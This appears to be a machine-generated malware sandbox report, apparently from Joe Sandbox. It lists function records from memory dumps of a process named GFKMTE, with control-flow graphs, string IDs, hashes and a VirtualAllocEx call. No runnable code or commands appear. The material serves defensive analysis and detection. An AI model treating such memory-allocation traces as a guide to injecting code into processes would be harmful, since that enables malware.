                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: h`$+$`
                                                                                                                                                  • API String ID: 0-4201317992
                                                                                                                                                  • Opcode ID: 98914f3dc25f308a28cf4f1fbc41b41acfa3bcaccf4d5a12da5b0fb82ed35ad2
                                                                                                                                                  • Instruction ID: 8c9f5daf55f1c642ef62a8f8ab2f7eaa32c848c74ac63e88a76ce84e822a50a2
                                                                                                                                                  • Opcode Fuzzy Hash: 98914f3dc25f308a28cf4f1fbc41b41acfa3bcaccf4d5a12da5b0fb82ed35ad2
                                                                                                                                                  • Instruction Fuzzy Hash: E281D374E002188FDB14DFA9D584A9DBBF2FF89301F149069E819AB365DB309D46CF60
                                                                                                                                                  Function 00E9B248 Relevance: 3.9, Strings: 3, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 385 e9b248-e9b26b 386 e9b26d 385->386 387 e9b272-e9b331 call e900e4 call e9b899 385->387 386->387 396 e9b36e-e9b372 387->396 397 e9b333-e9b36b 396->397 398 e9b374-e9b3f6 call e900f4 call e9bdd8 396->398 397->396
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <y$Teq$Teq
                                                                                                                                                  • API String ID: 0-402984361
                                                                                                                                                  • Opcode ID: 36ad292ee9661473dc3c64c943996cbdc69edd2c3ba9d53cacfc5109c26ea6a0
                                                                                                                                                  • Instruction ID: 8c05bded6c8c79ed262377795666545558f2d525c7a9d7d9e23ee7347ec0fc6c
                                                                                                                                                  • Opcode Fuzzy Hash: 36ad292ee9661473dc3c64c943996cbdc69edd2c3ba9d53cacfc5109c26ea6a0
                                                                                                                                                  • Instruction Fuzzy Hash: B8518574E012199FDB08CFA9D985A9EBBF2FF88300F14812AE915B7364DB755906CB50
                                                                                                                                                  Function 00E9B237 Relevance: 3.9, Strings: 3, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 409 e9b237-e9b245 410 e9b22b-e9b22e 409->410 411 e9b247-e9b26b 409->411 412 e9b26d 411->412 413 e9b272-e9b331 call e900e4 call e9b899 411->413 412->413 422 e9b36e-e9b372 413->422 423 e9b333-e9b36b 422->423 424 e9b374-e9b3e6 call e900f4 call e9bdd8 422->424 423->422 432 e9b3ec-e9b3f6 424->432
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <y$Teq$Teq
                                                                                                                                                  • API String ID: 0-402984361
                                                                                                                                                  • Opcode ID: 6fb951c80496b3b309678a0e3b50283fa7df51783d1cb1d37005ea7b3e9bbd8f
                                                                                                                                                  • Instruction ID: 594f56cd593e752f443cbbbeaa758fe4659407a965552053b8f954cab9f3208f
                                                                                                                                                  • Opcode Fuzzy Hash: 6fb951c80496b3b309678a0e3b50283fa7df51783d1cb1d37005ea7b3e9bbd8f
                                                                                                                                                  • Instruction Fuzzy Hash: 7951D674E012189FDF08CFE9D885A9EBBB2FF89300F14812AE915BB364DB715906CB50
                                                                                                                                                  Function 00E91000 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1120 e91000-e91023 1121 e9102a-e910e9 call e900e4 call e91651 1120->1121 1122 e91025 1120->1122 1131 e91126-e9112a 1121->1131 1122->1121 1132 e910eb-e91123 1131->1132 1133 e9112c-e9119e call e900f4 call e91b91 1131->1133 1132->1131 1141 e911a4-e911ae 1133->1141
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: ae8cac3203ad9425b933c5b20a8e81b4552991d9cbc5d2429aa27a4e99ca3bee
                                                                                                                                                  • Instruction ID: 67fa89ca84a66e94eb33791e992923a86c5a45c00b1f625a1b112c928945cc67
                                                                                                                                                  • Opcode Fuzzy Hash: ae8cac3203ad9425b933c5b20a8e81b4552991d9cbc5d2429aa27a4e99ca3bee
                                                                                                                                                  • Instruction Fuzzy Hash: 9F518674E012199FDB08CFA9D884A9EFBF2BF88300F148529E915B7364DB755946CF50
                                                                                                                                                  Function 00E94CA0 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1144 e94ca0-e94cc3 1145 e94cca-e94d89 call e900e4 call e952f1 1144->1145 1146 e94cc5 1144->1146 1155 e94dc6-e94dca 1145->1155 1146->1145 1156 e94d8b-e94dc3 1155->1156 1157 e94dcc-e94e3e call e900f4 call e95c38 1155->1157 1156->1155 1165 e94e44-e94e4e 1157->1165
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: d72b1598f90ed644195823d89364cbd5342343f0a929d31e59cf98cecbd6c208
                                                                                                                                                  • Instruction ID: b3d5d9e3667816b6ee2634efe2ddf88065d39a13dbdba97ac63b13e8f9dcd35c
                                                                                                                                                  • Opcode Fuzzy Hash: d72b1598f90ed644195823d89364cbd5342343f0a929d31e59cf98cecbd6c208
                                                                                                                                                  • Instruction Fuzzy Hash: FA519574E002199FDB08DFA9D884AAEBBF2BF88300F148129E915BB364DB755906CF50
                                                                                                                                                  Function 00E90FF1 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1168 e90ff1-e91023 1170 e9102a-e910e9 call e900e4 call e91651 1168->1170 1171 e91025 1168->1171 1180 e91126-e9112a 1170->1180 1171->1170 1181 e910eb-e91123 1180->1181 1182 e9112c-e9119e call e900f4 call e91b91 1180->1182 1181->1180 1190 e911a4-e911ae 1182->1190
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: c39f18c3321582fd2bc4026263ca9c7ff666a7e68c964c0c1030f440ea4cf2de
                                                                                                                                                  • Instruction ID: cd76281469bd536f7276edc9f7ae1c118debb81feb14331f8549173e80ae2626
                                                                                                                                                  • Opcode Fuzzy Hash: c39f18c3321582fd2bc4026263ca9c7ff666a7e68c964c0c1030f440ea4cf2de
                                                                                                                                                  • Instruction Fuzzy Hash: B551C974E012199FDB08CFE5D844A9EFBB2BF88300F14812AE915BB365DB355946CB50
                                                                                                                                                  Function 04E3A300 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E3A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 3df25dd2f48f703d608455ca43bfece2f2aa317f763e83f4c81481ee90f03ef7
                                                                                                                                                  • Instruction ID: 062f14dd64d538e0a06175172ecd4852e74358deff6e1fcdd464be1dc3e0c5e4
                                                                                                                                                  • Opcode Fuzzy Hash: 3df25dd2f48f703d608455ca43bfece2f2aa317f763e83f4c81481ee90f03ef7
                                                                                                                                                  • Instruction Fuzzy Hash: AB41ABB4D002589FCF10CFA9D984AEEFBB1BB49310F10A42AE825B7350D735A942CF54
                                                                                                                                                  Function 04E3A308 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E3A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: ea1bd1b18854b01fd3d0c0d17a741bbf25e6c47ac898fe2d09e9d17b410bbecd
                                                                                                                                                  • Instruction ID: 045fc34b2e84f5f4aabb5beae796753dc097ce3c782e1ce8ef420bcec156e6d0
                                                                                                                                                  • Opcode Fuzzy Hash: ea1bd1b18854b01fd3d0c0d17a741bbf25e6c47ac898fe2d09e9d17b410bbecd
                                                                                                                                                  • Instruction Fuzzy Hash: B83198B8D002589FCF10CFA9D985ADEFBB1BB49310F10A42AE815B7350D735A942CF58
                                                                                                                                                  Function 00E963F0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: a16fbf35c0cdbcf4bfc603098a1e01f266bf79dad8b56ba71ed2a51374b046b5
                                                                                                                                                  • Instruction ID: 4a2c3e4c267eccdf6971086681237e9eea9d32e935f285a09f288c454a0e4383
                                                                                                                                                  • Opcode Fuzzy Hash: a16fbf35c0cdbcf4bfc603098a1e01f266bf79dad8b56ba71ed2a51374b046b5
                                                                                                                                                  • Instruction Fuzzy Hash: 0A61F5B8900206DFCB04DF99C9848AEFBB6FF89300B618595D815A7365C731EE86CF94
                                                                                                                                                  Function 00E92348 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 5c61333f2e22b53cef5000cc0c70f77e6473f9d6e185b0cfc95413205fe88626
                                                                                                                                                  • Instruction ID: e5ff61219744d607e4dad420923506f4cbd174e94899e390749d5f96d8e3fbf9
                                                                                                                                                  • Opcode Fuzzy Hash: 5c61333f2e22b53cef5000cc0c70f77e6473f9d6e185b0cfc95413205fe88626
                                                                                                                                                  • Instruction Fuzzy Hash: 47612DB4A00206DFDB04DF99C9849AEFBB6FF88300B658598D915A7355C730EE86DF90
                                                                                                                                                  Function 00E9C590 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: be2b52a0d3d850571b0d20ef363467a6882f361d1eb9c2718d51c0f9ab72a2f5
                                                                                                                                                  • Instruction ID: 9209ce40d460c77c6848cb4dd5a943c2f0908cff6630b0a73577b0a96e4d6c54
                                                                                                                                                  • Opcode Fuzzy Hash: be2b52a0d3d850571b0d20ef363467a6882f361d1eb9c2718d51c0f9ab72a2f5
                                                                                                                                                  • Instruction Fuzzy Hash: BF613CB8900209DFCB04DFA9C9848AEFBB6FF49300B619594D855A7355C730EE86CFA0
                                                                                                                                                  Function 00E9C581 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: 5098982cf8fe2d275a02ac4dd36a8fa0b84e1ee34085f7df43cd6c716036e8f1
                                                                                                                                                  • Instruction ID: 427ceb146dc0ed2175adb3e1c2f4e68949506d61af41b5549fe479b336b68f6a
                                                                                                                                                  • Opcode Fuzzy Hash: 5098982cf8fe2d275a02ac4dd36a8fa0b84e1ee34085f7df43cd6c716036e8f1
                                                                                                                                                  • Instruction Fuzzy Hash: 353181B4D09215DFCB08DFAAC9444ADBBB2FF8A301B2090AAD455A7361C7319A46DF50
                                                                                                                                                  Function 00E963E0 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  • Opcode ID: a8096b57fe1a6a7fe473919bf91c0ffa0fbc1db328cdcd7d14ae572ba86f6540
                                                                                                                                                  • Instruction ID: 5febc3d347ebb64d7970705025d0159023434ce69958596a764a9dd3a48d3235
                                                                                                                                                  • Opcode Fuzzy Hash: a8096b57fe1a6a7fe473919bf91c0ffa0fbc1db328cdcd7d14ae572ba86f6540
                                                                                                                                                  • Instruction Fuzzy Hash: 5A3159B4D05304DFCB08CFAAC9448AEBFB2FF8A301B2584AAD415A7361C7319A46CF51
                                                                                                                                                  Function 00E9E209 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8q
                                                                                                                                                  • API String ID: 0-4083045702
                                                                                                                                                  • Opcode ID: 444cad2e49bdea740260bd6c97c07b40abc5578556fb56ae4f7207a70113c0ec
                                                                                                                                                  • Instruction ID: 9ca9dcd2a17f8ae1f6ab7cd15b8f528e7190a37a894cc86ee6a7d9db23d42965
                                                                                                                                                  • Opcode Fuzzy Hash: 444cad2e49bdea740260bd6c97c07b40abc5578556fb56ae4f7207a70113c0ec
                                                                                                                                                  • Instruction Fuzzy Hash: 98214674E002098FCB04DFA9D484AEEBBF2FF89300F209069D505BB265EB345A45CF50
                                                                                                                                                  Function 00E9E218 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8q
                                                                                                                                                  • API String ID: 0-4083045702
                                                                                                                                                  • Opcode ID: 3af067bf35ef1a6ddcd65a56cc6c81c3da9d97c3fc9d48bb91df101325e2c3e6
                                                                                                                                                  • Instruction ID: c7e8f1deee015f91d1e8b8f34bf3e1c6d50fdb77cf6bf29cf8b2709dd8f7b4c1
                                                                                                                                                  • Opcode Fuzzy Hash: 3af067bf35ef1a6ddcd65a56cc6c81c3da9d97c3fc9d48bb91df101325e2c3e6
                                                                                                                                                  • Instruction Fuzzy Hash: E7211474E002099FDB05DFA9D484AEEBBF2BF89300F209469D505BB364EA349A45CF91
                                                                                                                                                  Function 00E9F537 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9a5a8aebb54fd2b21d0d372187e3c0cc335f831061efa8dd3de1dc0c67b9944e
                                                                                                                                                  • Instruction ID: 4e9a4808e9b8a406e9ebb03d75e2bf5980f505544f6a9dbefc8716408839f9d0
                                                                                                                                                  • Opcode Fuzzy Hash: 9a5a8aebb54fd2b21d0d372187e3c0cc335f831061efa8dd3de1dc0c67b9944e
                                                                                                                                                  • Instruction Fuzzy Hash: 7991AC74E002189FDB54DFA8D894B9DBBF2BF88301F24816AE819E7395DB309945CF51
                                                                                                                                                  Function 00E9DFC8 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d6856d6e6fd62db03908ff526e325c0ff2048ceaa3ba04960326a8aa66526704
                                                                                                                                                  • Instruction ID: e06d2668e589b5938c97ea6ff7103d653bad0a59408527e6324fd25660f3155b
                                                                                                                                                  • Opcode Fuzzy Hash: d6856d6e6fd62db03908ff526e325c0ff2048ceaa3ba04960326a8aa66526704
                                                                                                                                                  • Instruction Fuzzy Hash: 0251CCB8E00208DFCB05DFB9D4849ADBBF2FF89301B20942AE805AB354DB319946CF55
                                                                                                                                                  Function 00E9DFD8 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9f1d7e2a72f614315497cc49c7bf653eb95d3a8b1bf16bdbc379074e0c7a0fea
                                                                                                                                                  • Instruction ID: b1bec5f09c8b8fb708ce11bfc609b9569319864552b2512c39a2ab0bfabebc5b
                                                                                                                                                  • Opcode Fuzzy Hash: 9f1d7e2a72f614315497cc49c7bf653eb95d3a8b1bf16bdbc379074e0c7a0fea
                                                                                                                                                  • Instruction Fuzzy Hash: 1851ACB8E00208DFCB09DFB9D48599DBBF2FF49301B20952AE815AB354DB319946CF55
                                                                                                                                                  Function 00E952F1 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 76175e4846b226acee8a61ea8aef6c2325af74728dcf60300ddfa98428aedecc
                                                                                                                                                  • Instruction ID: e7fe14eee3a317928396c8bb9147dbb69bc063c4f23e8d3cff6dd293a3f8e9a3
                                                                                                                                                  • Opcode Fuzzy Hash: 76175e4846b226acee8a61ea8aef6c2325af74728dcf60300ddfa98428aedecc
                                                                                                                                                  • Instruction Fuzzy Hash: 903148B5E046098FDB09CFAAC8446AEFBF2BF89300F14D06AD419B72A1D7745E41CB65
                                                                                                                                                  Function 00E91651 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 06e252138f3d8811c7e5a604768d7402cb56ecd593a406824b0ef79428adf0e7
                                                                                                                                                  • Instruction ID: 0ecdace250b503afacd39012bb8251d521aea826478830afd903c44f024c1c12
                                                                                                                                                  • Opcode Fuzzy Hash: 06e252138f3d8811c7e5a604768d7402cb56ecd593a406824b0ef79428adf0e7
                                                                                                                                                  • Instruction Fuzzy Hash: 5E3119B5E0064A8FDB08CF9AC9446AEFBF2EF89301F14D06AD519B72A1D7345941CB54
                                                                                                                                                  Function 00E9B899 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4eeff56398736510bfd29354d5062e34cc0cfedc59da72e8b6953e6320dcf8e9
                                                                                                                                                  • Instruction ID: bc78524dc4a66d655efd52d520f6d17a0f172d73696ec71250f453eba40611f9
                                                                                                                                                  • Opcode Fuzzy Hash: 4eeff56398736510bfd29354d5062e34cc0cfedc59da72e8b6953e6320dcf8e9
                                                                                                                                                  • Instruction Fuzzy Hash: F13146B4E042198FDB08CFAAD9446AEFBF2EF88301F14C06AD459B72A0D7744E41CB94
                                                                                                                                                  Function 00E96EB0 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3ff70296c42717caa8a3edc88fed755f6dd7d758426a41c0b778239d796961d8
                                                                                                                                                  • Instruction ID: 61dbb360e8b2a92129b006a0b62166f66982a29674d4ac2d504591ed10641a60
                                                                                                                                                  • Opcode Fuzzy Hash: 3ff70296c42717caa8a3edc88fed755f6dd7d758426a41c0b778239d796961d8
                                                                                                                                                  • Instruction Fuzzy Hash: CE31AD74E102199FCF00DFA9D884ADEBBB1FF48314F14916AE415B7241D730A995CFA4
                                                                                                                                                  Function 00E917F8 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: dfebe5da06037ee6dfa799cfe419c09f1e63eeb6d3f23dcdcac8833ed7ca2e3e
                                                                                                                                                  • Instruction ID: b3140c705c1191ea97c1e772f887020a12b3ddaa31e00a7a01918e82ad16e498
                                                                                                                                                  • Opcode Fuzzy Hash: dfebe5da06037ee6dfa799cfe419c09f1e63eeb6d3f23dcdcac8833ed7ca2e3e
                                                                                                                                                  • Instruction Fuzzy Hash: E6111874D00209EFDB08DFA9C945A9EBBF1FF49300F1586D6D414AB362D7709A41DB81
                                                                                                                                                  Function 00E9B9A1 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2235f652a225e723b9c412b9922bb9357f3447ce8f70f02b3ed0f9e11a1620e3
                                                                                                                                                  • Instruction ID: 66016a9a0ef25cfb047a283238d2e2f73f9c40b020f0016a37703a633a092486
                                                                                                                                                  • Opcode Fuzzy Hash: 2235f652a225e723b9c412b9922bb9357f3447ce8f70f02b3ed0f9e11a1620e3
                                                                                                                                                  • Instruction Fuzzy Hash: BD21B8B4E00209DFCB44CFA9D581AAEBBF1EF49300F6080A9D918A7751D7709E41CF91
